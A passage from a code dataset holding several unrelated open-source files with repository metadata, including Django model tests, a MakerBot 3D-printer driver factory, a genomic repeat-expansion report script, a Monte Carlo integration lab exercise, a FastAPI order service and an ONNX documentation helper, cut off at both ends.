Slide._meta.verbose_name,
"Slide",
)
self.assertEqual(
Slide._meta.verbose_name_plural,
"Slides",
)
def test_unicode_representation(self):
# Test the __unicode__ method returns the translated name
self.assertEqual(
self.slide.__unicode__(),
self.slide.safe_translation_getter("name"),
)
def test_translations(self):
# Test if translations are saved correctly
for language in languages:
self.slide.set_current_language(language)
self.assertEqual(self.slide.name, f"Slide 1_{language}")
self.assertEqual(self.slide.title, f"Slide Title_{language}")
self.assertEqual(self.slide.description, f"Slide Description_{language}")
self.assertEqual(self.slide.button_label, f"Slide Button Label_{language}")
def test_str_representation(self):
# Test the __str__ method returns the translated name
self.assertEqual(
str(self.slide),
self.slide.safe_translation_getter("name"),
)
def test_save(self):
self.slide.image = get_or_create_default_image("uploads/slides/no_photo.jpg")
self.slide.save()
self.assertTrue(default_storage.exists(self.slide.thumbnail.path))
self.assertTrue(default_storage.exists(self.slide.image.path))
def test_main_image_absolute_url(self):
# Test if main_image_absolute_url returns the correct URL
expected_url = settings.APP_BASE_URL + self.slide.image.url
self.assertEqual(self.slide.main_image_absolute_url, expected_url)
def test_main_image_filename(self):
# Test if main_image_filename returns the correct filename
expected_filename = os.path.basename(self.slide.image.name)
self.assertEqual(self.slide.main_image_filename, expected_filename)
def tearDown(self) -> None:
super().tearDown()
self.slide.delete()
self.slider.delete()
| vasilistotskas/grooveshop-django-api | tests/integration/slider/test_model_slide.py | test_model_slide.py | py | 4,545 | python | en | code | 4 | github-code | 13 |
31322322372 | from __future__ import absolute_import, print_function
import os
import threading
import makerbot_driver
class ReturnObject(object):
def __init__(self):
pass
class MachineFactory(object):
"""This class is a factory for building machine drivers from
a port connection. This class will take a connection, query it
to verify it is a geunine 3d printer (or other device we can control)
and build the appropritae machine type/version/etc from that.
"""
def __init__(self, profile_dir=None):
if profile_dir:
self.profile_dir = profile_dir
else:
self.profile_dir = os.path.join(
os.path.abspath(os.path.dirname(__file__)), 'profiles',)
def create_inquisitor(self, portname):
"""
This is made to ameliorate testing, this having to
assign internal objects with <obj>.<internal_obj> = <obj> is a
pain.
"""
return MachineInquisitor(portname)
def build_from_port(self, portname, leaveOpen=True, condition=None):
"""
Returns a tuple of an (s3gObj, ProfileObj)
for a machine at port portname
"""
machineInquisitor = self.create_inquisitor(portname)
if None is condition:
condition = threading.Condition()
s3gBot, machine_setup_dict = machineInquisitor.query(condition, leaveOpen)
profile_regex = self.get_profile_regex(machine_setup_dict)
matches = makerbot_driver.search_profiles_with_regex(
profile_regex, self.profile_dir)
matches = list(matches)
return_object = ReturnObject()
attrs = ['s3g', 'profile', 'gcodeparser']
for a in attrs:
setattr(return_object, a, None)
if len(matches) > 0:
bestProfile = matches[0]
setattr(return_object, 's3g', s3gBot)
profile = makerbot_driver.Profile(bestProfile, self.profile_dir)
profile.values['print_to_file_type']=[machine_setup_dict['print_to_file_type']]
profile.values['software_variant'] = machine_setup_dict['software_variant']
profile.values['tool_count_error'] = machine_setup_dict['tool_count_error']
setattr(return_object, 'profile', profile)
parser = makerbot_driver.Gcode.GcodeParser()
parser.s3g = s3gBot
parser.state.profile = getattr(return_object, 'profile')
setattr(return_object, 'gcodeparser', parser)
return return_object
def create_s3g(self, portname):
"""
This is made to ameliorate testing. Otherwise we would
not be able to reliably test the build_from_port function
w/o being permanently attached to a specific port.
"""
return makerbot_driver.s3g.from_filename(portname)
def get_profile_regex(self, machine_setup_dict):
"""
Decision tree for machine decisions.
@param dict machine_setup_dict: A dictionary containing
information about the connected machine
@return str
"""
regex = None
#First check for VID/PID matches
if 'vid' in machine_setup_dict and 'pid' in machine_setup_dict:
regex = self.get_profile_regex_has_vid_pid(machine_setup_dict)
if '.*Replicator2' == regex:
#if the pid does not belong to the legacy Rep2's then no toolcount
#inquiry is necessary, return the Rep2 regex
if(makerbot_driver.get_vid_pid_by_name('The Replicator 2')[1] ==
machine_setup_dict['pid']):
pass
elif regex and machine_setup_dict.get('tool_count', 0) == 2:
regex = regex + 'X'
elif machine_setup_dict.get('tool_count', 0) != 1:
regex = None
elif '.*Replicator2X' == regex:
pass
else:
if regex and machine_setup_dict.get('tool_count', 0) == 1:
regex = regex + 'Single'
elif regex and machine_setup_dict.get('tool_count', 0) == 2:
regex = regex + 'Dual'
else:
regex = None
return regex
def get_profile_regex_has_vid_pid(self, machine_setup_dict):
"""If the machine has a VID and PID, we can assume it is part of
the generation of machines that also have a tool_count. We use the
tool_count at the final criterion to narrow our search.
"""
vid_pid_matches = []
for machine in makerbot_driver.gMachineClasses.values():
if machine['vid'] == machine_setup_dict['vid'] and machine_setup_dict['pid'] in machine['pid']:
return machine['machineProfiles']
return None
class MachineInquisitor(object):
def __init__(self, portname):
""" build a machine Inqusitor for an exact port"""
self._portname = portname
def create_s3g(self, condition):
"""
This is made to ameliorate testing, this having to
assign internal objects with <obj>.<internal_obj> = <obj> is a
pain.
"""
return makerbot_driver.s3g.from_filename(self._portname, condition)
def query(self, condition, leaveOpen=True):
"""
open a connection to a machine and query a machine for
key settings needed to construct a machine from a profile
@param leaveOpen IF true, serial connection to the machine is left open.
@return a tuple of an (s3gObj, dictOfSettings
"""
import makerbot_driver.s3g as s3g
settings = {}
s3gDriver = self.create_s3g(condition)
s3gDriver.clear_buffer()
settings['vid'], settings['pid'] = s3gDriver.get_vid_pid()
firmware_version = s3gDriver.get_version()
try:
s3gDriver.init_eeprom_reader(firmware_version)
except makerbot_driver.EEPROM.MissingEepromMapError:
pass
settings['tool_count'] = s3gDriver.get_toolhead_count()
if settings['tool_count'] not in makerbot_driver.constants.valid_toolhead_counts :
settings['tool_count'] = 1
settings['tool_count_error'] = True
else:
settings['tool_count_error'] = False
try:
version_settings = s3gDriver.get_advanced_version();
settings['software_variant'] = hex(version_settings['SoftwareVariant'])
if version_settings['SoftwareVariant'] != 0:
s3gDriver.set_print_to_file_type('x3g')
settings['print_to_file_type'] = 'x3g'
else:
s3gDriver.set_print_to_file_type('s3g')
settings['print_to_file_type'] = 's3g'
except makerbot_driver.CommandNotSupportedError:
s3gDriver.set_print_to_file_type('s3g')
settings['software_variant'] = hex(0)
settings['print_to_file_type'] = 's3g'
if len(settings['software_variant'].split('x')[1]) == 1:
settings['software_variant'] = settings['software_variant'].replace('x', 'x0')
if not leaveOpen:
s3gDriver.close()
return s3gDriver, settings
| AstroPrint/AstroBox | src/ext/makerbot_driver/MachineFactory.py | MachineFactory.py | py | 7,180 | python | en | code | 158 | github-code | 13 |
72963580179 | import argparse
import os.path as op
import json
import math
import sys
import pandas as pd
from collections import Counter
from multiprocessing import Pool, cpu_count
from . import __version__
from .meta import TREDsRepo
from .utils import DefaultHelpParser
def left_truncate_text(a, maxcol=30):
trim = lambda t: (t if not isinstance(t, basestring) \
or len(t) <= maxcol else "..." + t[-(maxcol - 3):])
return [trim(x) for x in list(a)]
def get_tred_summary(df, tred, repo, minPP=.5, casesfw=None, detailsfw=None):
pf1 = tred + ".1"
pf2 = tred + ".2"
tr = repo[tred]
row = tr.row
title = row["title"]
inheritance = row["inheritance"]
repeat = row["repeat"]
repeat_location = row["repeat_location"]
cutoff_prerisk, cutoff_risk = tr.cutoff_prerisk, tr.cutoff_risk
label = tred + ".label"
pp = tred + ".PP"
prerisk = df[df[label] == "prerisk"]
risk = df[(df[label] == "risk") & (df[pp] > minPP)]
if tr.is_expansion:
carrier = df[(df[label] != "risk") & (df[pf2] >= cutoff_risk)]
else:
carrier = df[(df[label] != "risk") & (df[pf2] <= cutoff_risk) \
& (df[pf2] > 0)]
risk = risk.copy()
n_prerisk = prerisk.shape[0]
n_risk = risk.shape[0]
n_carrier = carrier.shape[0]
calls = tred + ".calls"
core = ["SampleKey", "inferredGender", calls]
columns = core + [tred + ".FR", tred + ".PR", tred + ".RR", pp]
# Truncate the display of FR/PR
risk[tred + ".FR"] = left_truncate_text(risk[tred + ".FR"])
risk[tred + ".PR"] = left_truncate_text(risk[tred + ".PR"])
risk[tred + ".RR"] = left_truncate_text(risk[tred + ".RR"])
if detailsfw:
details_columns = core[:]
details_columns.extend([tred + ".FDP", tred + ".PDP",
tred + ".RDP", tred + ".PEDP"])
for idx, row in risk[details_columns].iterrows():
if tred == "AR":
break
samplekey, sex, calls, fdp, pdp, rdp, pedp = row
fdp = int(fdp)
pdp = int(pdp)
rdp = int(rdp)
pedp = int(pedp)
atoms = [tred, tr.inheritance, samplekey, sex, calls, fdp, pdp, rdp, pedp]
print >> detailsfw, "\t".join(str(x) for x in atoms)
pt = risk[columns]
if n_risk:
print >> casesfw, "[{}] - {}".format(tred, title)
print >> casesfw, "rep={}".format(repeat), "inherit={}".format(inheritance),\
"cutoff={}".format(cutoff_risk), \
"n_risk={}".format(n_risk), \
"n_carrier={}".format(n_carrier), \
"loc={}".format(repeat_location)
print >> casesfw, pt.to_string(index=False)
print >> casesfw
# Allele frequency
cnt = Counter()
cnt.update(df[tred + ".1_"])
cnt.update(df[tred + ".2_"])
del cnt[-1]
return tr, n_prerisk, n_risk, n_carrier, counts_to_af(cnt)
def counts_to_af(counts):
return "{" + ",".join("{}:{}".format(k, v) for k, v in \
sorted(counts.items()) if not (k == '.' or math.isnan(k))) + "}"
def df_to_tsv(df, tsvfile, extra_columns=[], jsonformat=True,
ref="hg38"):
df = df.fillna(-1)
dd = ["SampleKey"]
if jsonformat:
dd += ["inferredGender"]
repo = TREDsRepo(ref)
for tred in repo.names:
tr = repo[tred]
if tred + ".1" not in df.columns:
continue
df[tred + ".1_"] = df[tred + ".1"].astype("int")
df[tred + ".2_"] = df[tred + ".2"].astype("int")
if jsonformat and tr.is_xlinked:
df.loc[(df["inferredGender"] == "Male"), tred + ".2_"] = "."
df[tred + ".calls"] = ["{}|{}".format(a, b) for (a, b) in
zip(df[tred + ".1_"], df[tred + ".2_"])]
all_columns = ["calls", "label"] + extra_columns
columns = dd + sorted([x for x in df.columns if (x not in dd) and \
any(x.endswith("." + z) for z in all_columns)])
tf = df.reindex_axis(columns, axis='columns')
tf.sort_values("SampleKey")
tf.to_csv(tsvfile, sep='\t', index=False)
print >> sys.stderr, "TSV output written to `{}` (# samples={})"\
.format(tsvfile, tf.shape[0])
return df
def vcf_to_df_worker(vcffile):
""" Convert VCF to data frame, single thread
"""
import vcf
samplekey = op.basename(vcffile).split(".")[0]
reader = vcf.Reader(open(vcffile, "rb"))
d = {'SampleKey': samplekey}
for rec in reader:
tr = rec.ID
sample = rec.samples[0]
a, b = sample["GB"].split("/")
d[tr + ".1"] = int(a)
d[tr + ".2"] = int(b)
for k in ["PP", "FR", "PR"]:
d[tr + "." + k] = sample[k]
d[tr + ".label"] = sample["LABEL"]
return d
def vcf_to_df(vcffiles, tsvfile, cpus):
"""
Compile a number of vcf files into tsv file for easier manipulation.
"""
df = pd.DataFrame()
p = Pool(processes=cpus)
results = []
r = p.map_async(vcf_to_df_worker, vcffiles,
callback=results.append)
r.wait()
for res in results:
df = df.append(res, ignore_index=True)
return df
def json_to_df_worker(jsonfile):
js = json.load(open(jsonfile))
samplekey = js['samplekey']
results = js['tredCalls']
# We'll infer sample key from file names for now since the keys are not
# properly populated in v0.6.4 and v0.6.5
samplekey = op.basename(jsonfile).split(".")[0]
d = {'SampleKey': samplekey}
d.update(results)
return d
def json_to_df(jsonfiles, tsvfile, cpus):
"""
Compile a number of json files into tsv file for easier manipulation.
"""
df = pd.DataFrame()
p = Pool(processes=cpus)
results = []
r = p.map_async(json_to_df_worker, jsonfiles,
callback=results.append)
r.wait()
for res in results:
df = df.append(res, ignore_index=True)
return df
def main(args):
p = DefaultHelpParser(description=__doc__, prog=op.basename(__file__),
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
p.add_argument("files", nargs="*")
p.add_argument('--ref', help='Reference genome version',
choices=("hg38", "hg38_nochr", "hg19", "hg19_nochr"), default='hg38')
p.add_argument('--tsv', default="out.tsv",
help="Path to the tsv file")
p.add_argument('--columns',
help="Columns to extract, use comma to separate")
p.add_argument('--minPP', default=.5, type=float,
help="Minimum Prob(pathological) to report cases")
p.add_argument('--cpus', default=cpu_count(),
help='Number of threads')
p.add_argument('--version', action='version', version="%(prog)s " + __version__)
args = p.parse_args(args)
files = args.files
ref = args.ref
tsvfile = args.tsv
columns = args.columns.split(",") if args.columns else []
repo = TREDsRepo(ref)
alltreds = repo.names
if files:
nfiles = len(files)
cpus = min(nfiles, args.cpus)
jsonformat = files[0].endswith(".json")
suffix = "JSON" if jsonformat else "VCF"
print >> sys.stderr, "Using {} cpus to parse {} {} files"\
.format(cpus, nfiles, suffix)
if jsonformat:
df = json_to_df(files, tsvfile, cpus)
else:
df = vcf_to_df(files, tsvfile, cpus)
df = df_to_tsv(df, tsvfile, extra_columns=columns, jsonformat=jsonformat,
ref=ref)
else:
if op.exists(tsvfile):
df = pd.read_csv(tsvfile, sep="\t")
else:
sys.exit(not p.print_help())
if df.empty:
print >> sys.stderr, "Dataframe empty - check input files"
sys.exit(1)
reportfile = tsvfile + ".report.txt"
summary = pd.DataFrame()
total_prerisk = total_risk = total_carrier = total_loci = 0
# Outlier cases and associated read count details
cases = tsvfile + ".cases.txt"
casesfw = open(cases, "w")
details = tsvfile + ".details.txt"
detailsfw = open(details, "w")
header = "Locus,Inheritance,SampleKey,Sex,Calls,FullReads,PartialReads,"\
"RepeatReads,PairedReads"
print >> detailsfw, "\t".join(header.split(','))
for tred in alltreds:
if tred + ".label" not in df.columns:
continue
tr, n_prerisk, n_risk, n_carrier, af = \
get_tred_summary(df, tred, repo, minPP=args.minPP,
casesfw=casesfw, detailsfw=detailsfw)
total_prerisk += n_prerisk
total_risk += n_risk
total_carrier += n_carrier
if n_risk:
total_loci += 1
tr = tr.row
columns = ["abbreviation", "title", "motif", "inheritance",
"cutoff_prerisk", "cutoff_risk"]
d = dict((c, tr[c]) for c in columns[1:])
d["abbreviation"] = tred
d["n_prerisk"] = n_prerisk
d["n_risk"] = n_risk
d["n_carrier"] = n_carrier
d["allele_freq"] = af
summary = summary.append(d, ignore_index=True)
print >> sys.stderr, "Outlier cases saved to `{}`".format(casesfw.name)
casesfw.close()
print >> sys.stderr, "Read count details saved to `{}`"\
.format(detailsfw.name)
detailsfw.close()
summary.to_csv(reportfile, sep="\t", index=False, float_format="%d")
print >> sys.stderr, "Summary report written to `{}` (# samples={})"\
.format(reportfile, summary.shape[0])
print >> sys.stderr, "Summary: n_prerisk={}, n_risk={}, n_carrier={}, n_affected_loci={}"\
.format(total_prerisk, total_risk, total_carrier, total_loci)
| humanlongevity/tredparse | tredparse/tredreport.py | tredreport.py | py | 9,762 | python | en | code | 22 | github-code | 13 |
73755944339 | import random as rnd
#
# x0 = 1 #входные числа x0 и y0
# y0 = 2
#
# r0 = 5 #радиус окружности
#
# # ExpNmb = int(input("Напишите нужное количество экспериментов: ")) #ДЛЯ ЗАДАНИЯ 1
#
# def CALC_PI(x0, y0, r0, ExpNmb):
# m = 0 # обнуляем количество положителяных экспериментов
#
# xmin = x0 - r0
# xmax = x0 + r0
#
# ymin = y0 - r0
# ymax = y0 + r0
#
# for i in range(ExpNmb):
# p = rnd.random()
# xp = (xmax - xmin) * p + xmin
#
# p = rnd.random()
# yp = (ymax - ymin) * p + ymin
#
# if (xp - x0) ** 2 + (yp - y0) ** 2 < r0 ** 2:
# m += 1
#
# pi = (m / ExpNmb) * 4
# return pi
#
#
# ExpNmb = 10**4 # ДЛЯ ЗАДАНИЯ 2 ПУНКТ 1, 2, 3
#
#
# # print(f" число пи: {CALC_PI(x0, y0, r0, ExpNmb)}") # ДЛЯ ЗАДАНИЯ 1 И ЗАДАНИЯ ДВА (ЧАСТЬ 1)
#
#
# # ДЛЯ ЗАДАНИЯ 2 ПУНКТ 2 И ПУНКТ 3
#
# def SERIA(ExpNmb):
# SERIA_test = []
#
# for i in range(5):
# SERIA_test.append(CALC_PI(x0, y0, r0, ExpNmb))
# ExpNmb = ExpNmb * 10
#
# return SERIA_test
#
#
# # ДЛЯ ЗАДАНИЯ 2 ПУНКТ 2 И 3
#
# SERIA_1 = SERIA(ExpNmb)
# SERIA_2 = SERIA(ExpNmb)
# SERIA_3 = SERIA(ExpNmb)
# SERIA_4 = SERIA(ExpNmb)
# SERIA_5 = SERIA(ExpNmb)
#
# # ДЛЯ ЗАДАНИЯ 2 ПУНКТ 2 И 3 вывод
#
# # print(f"SERIA_1: {SERIA_1}")
# # print(f"SERIA_2: {SERIA_2}")
# # print(f"SERIA_3: {SERIA_3}")
# # print(f"SERIA_4: {SERIA_4}")
# # print(f"SERIA_5: {SERIA_5}")
#
# # ЗАДАНИЕ 3 ПУНКТ 1
#
# def CALC_EPS(SERIA):
# Eps = []
#
# for i in range(len(SERIA)):
# Epsi = abs((SERIA[i] - 3.1415926535) / 3.1415926535)
# Eps.append(Epsi)
#
# return Eps
#
# Eps1 = CALC_EPS(SERIA_1)
# Eps2 = CALC_EPS(SERIA_2)
# Eps3 = CALC_EPS(SERIA_3)
# Eps4 = CALC_EPS(SERIA_4)
# Eps5 = CALC_EPS(SERIA_5)
#
# # ЗАДАНИЕ 3 ПУНКТ 1 ВЫВОД
#
# # print(f"погрешность для 1й серии экспериментов: {Eps1}")
# # print(f"погрешность для 2й серии экспериментов: {Eps2}")
# # print(f"погрешность для 3й серии экспериментов: {Eps3}")
# # print(f"погрешность для 4й серии экспериментов: {Eps4}")
# # print(f"погрешность для 5й серии экспериментов: {Eps5}")
#
#
# # ЗАДАНИЕ 3 ПУНКТ 2 И 3
#
# def CALC_EPS_S_e(i):
# S_e = (SERIA_1[i] + SERIA_2[i] + SERIA_3[i] + SERIA_4[i] + SERIA_5[i]) / 5
#
# Eps_S_e = abs((S_e - 3.1415926535) / 3.1415926535)
#
# return Eps_S_e
#
# # ЗАДАНИЕ 3 ПУНКТ 2 И 3 ВЫВОД
#
# print(CALC_EPS_S_e(0)) # EPS_S_e4 (ExpNmb = 10**4)
# print(CALC_EPS_S_e(1)) # EPS_S_e5 (ExpNmb = 10**5)
# print(CALC_EPS_S_e(2)) # EPS_S_e6 (ExpNmb = 10**6)
# print(CALC_EPS_S_e(3)) # EPS_S_e7 (ExpNmb = 10**7)
# print(CALC_EPS_S_e(4)) # EPS_S_e8 (ExpNmb = 10**8)
# ЗАДАНИЕ 4 ПУНКТ 2 (ПУНКТ 1 ЯВЛЯЕТСЯ ТЕОРИЕЙ)
a = 0
b = 2
f_b = b ** 3 + 1
ExpNmb_ = 10**4
def CALC_INTEGRAL(a, b, f_b, ExpNmb_):
x_min = a # a = x_min
x_max = b # b = x_max
y_min = 0
y_max = f_b
m_ = 0
for i in range(ExpNmb_):
p = rnd.random()
x = (x_max - x_min) * p + x_min
p = rnd.random()
y = (y_max - y_min) * p + y_min
if (x ** 3 + 1) > y:
m_ += 1
S = (m_ / ExpNmb_) * (b - a) * f_b
return S
print(f" Интеграл: {CALC_INTEGRAL(a, b, f_b, ExpNmb_)}")
# ЗАДАНИЕ 4 ПУНКТ 3 (СОЗДАНИЕ ПЯТИ ВЕКТОРОВ VEK_INT) (КАК В ЗАДАНИИ 2)
def VEK_INT(ExpNmb_):
VEK_INT_test = []
for i in range(5):
VEK_INT_test.append(CALC_INTEGRAL(a, b, f_b, ExpNmb_))
ExpNmb_ = ExpNmb_ * 10
return VEK_INT_test
VEK_INT_1 = VEK_INT(ExpNmb_)
VEK_INT_2 = VEK_INT(ExpNmb_)
VEK_INT_3 = VEK_INT(ExpNmb_)
VEK_INT_4 = VEK_INT(ExpNmb_)
VEK_INT_5 = VEK_INT(ExpNmb_)
# print(f"VEK_INT_1: {VEK_INT_1}")
# print(f"VEK_INT_2: {VEK_INT_2}")
# print(f"VEK_INT_3: {VEK_INT_3}")
# print(f"VEK_INT_4: {VEK_INT_4}")
# print(f"VEK_INT_5: {VEK_INT_5}")
# РАСЧЕТ ПОГРЕШНОСТИ (КАК В ЗАДАНИИ 3 ПУНКТ 1)
def CALC_EPS_VEK(VEK_INT):
Eps_VEK = []
for i in range(len(VEK_INT)):
Eps_VEKi = abs((VEK_INT[i] - 6) / 6)
Eps_VEK.append(Eps_VEKi)
return Eps_VEK
Eps_VEK_1 = CALC_EPS_VEK(VEK_INT_1)
Eps_VEK_2 = CALC_EPS_VEK(VEK_INT_2)
Eps_VEK_3 = CALC_EPS_VEK(VEK_INT_3)
Eps_VEK_4 = CALC_EPS_VEK(VEK_INT_4)
Eps_VEK_5 = CALC_EPS_VEK(VEK_INT_5)
# print(f"погрешность для 1й серии экспериментов: {Eps_VEK_1}")
# print(f"погрешность для 2й серии экспериментов: {Eps_VEK_2}")
# print(f"погрешность для 3й серии экспериментов: {Eps_VEK_3}")
# print(f"погрешность для 4й серии экспериментов: {Eps_VEK_4}")
# print(f"погрешность для 5й серии экспериментов: {Eps_VEK_5}")
# РАСЧЕТ ПОГРЕШНОСТИ (КАК В ЗАДАНИИ 3 ПУНКТ 2 и 3)
def CALC_EPS_S_e_VEK(i):
S_e_VEK = (VEK_INT_1[i] + VEK_INT_2[i] + VEK_INT_3[i] + VEK_INT_4[i] + VEK_INT_5[i]) / 5
Eps_S_e_VEK = abs((S_e_VEK - 6) / 6)
return Eps_S_e_VEK
print(CALC_EPS_S_e_VEK(0)) # EPS_S_e4 (ExpNmb = 10**4)
print(CALC_EPS_S_e_VEK(1)) # EPS_S_e5 (ExpNmb = 10**5)
print(CALC_EPS_S_e_VEK(2)) # EPS_S_e6 (ExpNmb = 10**6)
print(CALC_EPS_S_e_VEK(3)) # EPS_S_e7 (ExpNmb = 10**7)
print(CALC_EPS_S_e_VEK(4)) # EPS_S_e8 (ExpNmb = 10**8)
| AdastroAgni/Modeling_Of_Systems | lab_1/main.py | main.py | py | 5,805 | python | ru | code | 0 | github-code | 13 |
20273919398 | from django.shortcuts import render
from django.contrib.contenttypes.models import ContentType
from .models import ReadDetail
from blog.models import Blog
import datetime
import pytz
# Create your views here.
def get_week_data(request):
now = datetime.datetime.now()
now_day = datetime.datetime(now.year, now.month, now.day, 0, 0, tzinfo=pytz.timezone('Asia/Shanghai'))
days = []
days_str = []
counts = []
ct = ContentType.objects.get_for_model(Blog)
# 拼装日期
for n in range(7, 0, -1):
day = now_day - datetime.timedelta(n)
days.append(day)
# 拼装每日阅读数
for day in days:
count = ReadDetail.objects.filter(content_type=ct, requested_at__range=(day, day+datetime.timedelta(1))).count()
counts.append(count)
day_str = str(day)[6:10]
days_str.append(day_str)
context = {
'read_num': counts,
'days': days_str,
}
return render(request, 'data.html', context=context) | wangcai-a/django_blog | data/views.py | views.py | py | 998 | python | en | code | 0 | github-code | 13 |
74653480657 | from fastapi import HTTPException
from starlette import status
from api.schemas.common import Pagination
from api.schemas.order import (
CreateOrder,
CreateOrderItem,
CreateOrderResponse,
Order,
OrderItem,
OrderRequest,
)
from api.schemas.product import Product
from api.schemas.user import User
from repositories.orders import OrderRepository
from services.common import CommonService
from services.products import ProductService
from services.users import UserService
class OrderService(CommonService):
_model = Order
_repository = OrderRepository
_create_model = CreateOrder
_create_response_model = CreateOrderResponse
_verbose_name = 'order'
@classmethod
async def create_order(cls, create_order: CreateOrder) -> Order | None:
user = await cls.valid_user(create_order)
items: [OrderItem] = []
total: float = 0.0
order_dict = {'user_id': user.id, 'user_name': user.name}
for item in create_order.items:
product = await cls.valid_product(item)
price = item.price if item.price else product.price
amount = price * item.quantity
valid_item = OrderItem(
product_id=product.id,
product_name=product.name,
quantity=item.quantity,
price=price,
amount=amount,
)
total += amount
items.append(valid_item)
order_dict['items'] = items
order_dict['total'] = total
result = Order(**order_dict)
return result
@classmethod
async def valid_user(cls, create_order: CreateOrder) -> User:
if create_order.user_id:
return await UserService.get_by_id(create_order.user_id)
elif create_order.user_name:
return await UserService.get_by_field('login', create_order.user_name)
else:
raise HTTPException(status_code=400, detail='user_id or user_name must be non null')
@classmethod
async def valid_product(cls, product: CreateOrderItem) -> Product:
if product.product_id:
return await ProductService.get_by_id(product.product_id)
elif product.product_name:
return await ProductService.get_by_field('name', product.product_name)
else:
raise HTTPException(
status_code=status.HTTP_400_BAD_REQUEST,
detail='product_id or product_name must be not null',
)
@classmethod
async def get_custom(
cls, pagination: Pagination, params: OrderRequest
) -> tuple[int, int, list[_model]]:
# order_request = {'time': 167803456, 'user_name': 'Alex', 'sort_by': 'time', 'sorting': 'desc'}
query = {}
if params.user_name:
query.update({'user_name': params.user_name})
if params.user_id:
query.update({'user_id': params.user_id})
if params.product_id:
query.update({'items.product_id': params.product_id})
if params.product_name:
query.update({'items.product_name': params.product_name})
if params.date_from:
query.update({'created': {'$gte': params.date_from}})
if params.date_to:
query.update({'created': {'$lte': params.date_to}})
result = cls._repository.get_custom_list(
pagination, query=query, sort_by=str(params.sort_by.value), sorting=params.sorting
)
return pagination.page, pagination.limit, result
| SergueiMoscow/MongoDB_study | services/orders.py | orders.py | py | 3,534 | python | en | code | 0 | github-code | 13 |
25288273270 | #!/usr/bin/env python3
from collections import namedtuple
Instruction = namedtuple('Instruction', ('operation', 'argument'))
def run_program(program, force_jmp=None, force_nop=None):
index = 0
acc = 0
visited = set()
while index not in visited:
visited.add(index)
try:
instruction = program[index]
except IndexError:
print(f'Answer part 2: {acc}')
return acc
if force_jmp == index:
index += instruction.argument
elif force_nop == index:
index += 1
elif instruction.operation == 'nop':
index += 1
elif instruction.operation == 'acc':
acc += instruction.argument
index += 1
elif instruction.operation == 'jmp':
index += instruction.argument
return acc
if __name__ == '__main__':
program = []
with open('input_8.txt') as f:
for line in f:
operation, argument = line.strip().split()
program.append(Instruction(operation, int(argument)))
print('Answer part 1: {}'.format(run_program(program)))
nops = []
jmps = []
for index, instruction in enumerate(program):
if instruction.operation == 'nop':
nops.append(index)
elif instruction.operation == 'jmp':
jmps.append(index)
for nop in nops:
run_program(program, force_jmp=nop)
for jmp in jmps:
run_program(program, force_nop=jmp)
| erijpkema/advent_of_code_2020 | day8.py | day8.py | py | 1,494 | python | en | code | 0 | github-code | 13 |
40571368391 | #!/bin/env python3
# Este script cria o índice das dicas no README.
import os
import os.path
import re
from typing import Dict, List, Tuple
def obtem_topicos() -> Dict[str, List[Tuple]]:
topicos: Dict[str, List[Tuple]] = {}
for item_dir in sorted(os.listdir(".")):
if not os.path.isdir(item_dir):
continue
if item_dir.startswith("."):
continue
if item_dir not in topicos:
topicos[item_dir] = []
for item_file in sorted(os.listdir(item_dir)):
path = os.path.join(item_dir, item_file)
if not os.path.isfile(path):
continue
if not item_file.endswith(".md"):
continue
with open(path) as fp:
line = fp.readline().strip()
m = re.match(r"# (.+)$", line)
if m:
title = m.group(1)
else:
raise ValueError("título inválido para {}".format(path))
topicos[item_dir].append((item_file, title))
return topicos
def atualiza_readme(topicos: Dict[str, List[Tuple]]) -> None:
readme: List[str] = []
readme.append("# tips\n")
readme.append("\n")
readme.append(
"Este repositório contém algumas dicas de atalhos e tarefas específicas,\n"
)
readme.append("registradas para não se perderem no esquecimento.\n")
readme.append("\n")
for topico in topicos:
readme.append("## {}\n".format(topico))
readme.append("\n")
for arquivo, titulo in topicos[topico]:
readme.append(f"* [{titulo}]({topico}/{arquivo})\n")
readme.append("\n")
with open("README.md", "w") as fp:
fp.writelines(readme)
if __name__ == "__main__":
topicos = obtem_topicos()
atualiza_readme(topicos)
| zanardo/tips | index.py | index.py | py | 1,822 | python | pt | code | 0 | github-code | 13 |
22035974505 | #
# @lc app=leetcode.cn id=337 lang=python3
#
# [337] 打家劫舍 III
#
from typing import List, Optional
from collections import deque
from leetcode_tool import *
# @lc code=start
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def rob(self, root: Optional[TreeNode]) -> int:
odd, even = 0, 0
cur_nodes = deque()
cur_nodes.append(root)
idx = 1
while cur_nodes:
next_nodes = deque()
for cur_node in cur_nodes:
if cur_node:
if idx % 2 == 1:
odd += cur_node.val
else:
even += cur_node.val
if cur_node.left:
next_nodes.append(cur_node.left)
if cur_node.right:
next_nodes.append(cur_node.right)
cur_nodes = next_nodes
idx += 1
return max(odd, even)
# @lc code=end
def test():
assert Solution().rob(create_tree([3, 2, 3, None, 3, None, 1])) == 7
assert Solution().rob(create_tree([3, 4, 5, 1, 3, None, 1])) == 9
assert Solution().rob(create_tree([4, 1, None, 2, None, 3])) == 7
| revang/leetcode | 337.打家劫舍-iii.py | 337.打家劫舍-iii.py | py | 1,350 | python | en | code | 0 | github-code | 13 |
71473261137 | import os
from collections import defaultdict
from typing import Any, Dict, List, NamedTuple, Sequence, Set, Tuple
import numpy as np
from onnx import defs, helper
from onnx.backend.sample.ops import collect_sample_implementations
from onnx.backend.test.case import collect_snippets
from onnx.defs import ONNX_ML_DOMAIN, OpSchema
SNIPPETS = collect_snippets()
SAMPLE_IMPLEMENTATIONS = collect_sample_implementations()
ONNX_ML = not bool(os.getenv("ONNX_ML") == "0")
def display_number(v: int) -> str:
if defs.OpSchema.is_infinite(v):
return "∞"
return str(v)
def should_render_domain(domain: str, output: str) -> bool:
is_ml = "-ml" in output
if domain == ONNX_ML_DOMAIN:
return is_ml
else:
return not is_ml
def format_name_with_domain(domain: str, schema_name: str) -> str:
if domain:
return f"{domain}.{schema_name}"
return schema_name
def format_function_versions(function_versions: Sequence[int]) -> str:
return f"{', '.join([str(v) for v in function_versions])}"
def format_versions(versions: Sequence[OpSchema], changelog: str) -> str:
return f"{', '.join(display_version_link(format_name_with_domain(v.domain, v.name), v.since_version, changelog) for v in versions[::-1])}"
def display_attr_type(v: OpSchema.AttrType) -> str:
assert isinstance(v, OpSchema.AttrType)
s = str(v)
s = s[s.rfind(".") + 1 :].lower()
if s[-1] == "s":
s = "list of " + s
return s
def display_domain(domain: str) -> str:
if domain:
return f"the '{domain}' operator set"
return "the default ONNX operator set"
def display_domain_short(domain: str) -> str:
